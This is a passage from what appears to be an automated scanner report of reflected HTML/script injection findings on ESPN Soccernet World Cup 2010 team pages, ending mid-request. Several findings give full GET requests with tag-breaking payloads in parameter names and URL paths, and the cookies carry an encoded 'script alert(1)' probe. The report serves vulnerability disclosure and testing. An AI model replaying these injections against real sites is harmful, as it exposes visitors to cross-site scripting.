HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT Content-Length: 82012 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics"> ...[SNIP]...
5.109. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/628/australia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT Content-Length: 82120 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:15 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT Content-Length: 81962 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss"> ...[SNIP]...
5.111. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/656/cameroon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:27 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT Content-Length: 82070 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT Content-Length: 81727 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team"> ...[SNIP]...
5.113. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/657/nigeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT Content-Length: 81827 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT Content-Length: 82134 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1"> ...[SNIP]...
5.115. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/660/united-states
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT Content-Length: 82242 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 